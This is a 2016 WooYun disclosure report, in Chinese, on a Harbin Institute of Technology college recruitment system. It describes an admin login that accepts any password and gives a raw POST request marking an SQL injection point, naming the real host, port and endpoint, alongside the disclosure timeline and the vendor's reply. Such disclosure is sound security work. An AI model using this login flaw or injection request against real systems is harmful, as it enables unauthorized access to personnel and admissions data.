漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2016-0167830
漏洞标题:哈工大某学院任意密码管理员登录和sql注入(几十个库)
相关厂商:哈尔滨工业大学
漏洞作者: lostime
提交时间:2016-01-07 13:41
修复时间:2016-02-20 15:48
公开时间:2016-02-20 15:48
漏洞类型:后台弱口令
危害等级:高
自评Rank:10
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2016-01-07: 细节已通知厂商并且等待厂商处理中
2016-01-07: 厂商已经确认,细节仅向厂商公开
2016-01-17: 细节向核心白帽子及相关领域专家公开
2016-01-27: 细节向普通白帽子公开
2016-02-06: 细节向实习白帽子公开
2016-02-20: 细节向公众公开
简要描述:
1.管理员弱口令登录
2.sql注入漏洞
详细说明:
管理员登录:
地址 http://219.223.252.7:8880/rsgl/recruit/logout.do
使用admin+任意密码可以登录
sql注入:
POST /rsgl/recruit/isRegistered.do?&noCache=64349 HTTP/1.1
Host: 219.223.252.7:8880
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=218EBC994D904BCF1FD0CDF5A6AFDE5A
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 9
pkvalue=*1
漏洞证明:
任意密码登录
sql注入,几十个库,随便看了下当前库200多张表,其中还有人事录取信息等:
后面就不深入了
修复方案:
限制登录
过滤
版权声明:转载请注明来源 lostime@乌云
漏洞回应
厂商回应:
危害等级:低
漏洞Rank:5
确认时间:2016-01-07 18:23
厂商回复:
分站系统,十分感谢
最新状态:
暂无